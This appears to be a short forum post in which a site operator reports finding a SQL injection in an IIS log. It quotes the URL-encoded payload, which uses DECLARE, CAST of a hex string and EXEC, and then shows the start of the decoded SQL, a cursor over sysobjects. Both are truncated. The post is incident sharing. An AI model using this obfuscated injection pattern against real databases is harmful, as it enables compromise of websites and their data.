We had the same problem 25 September. I found sql-injection in IIS log:

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564152434841522832353529220.............%20AS%20VARCHAR(4000));EXEC(@S)

I converted this text from HEX-format. LOOK:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects...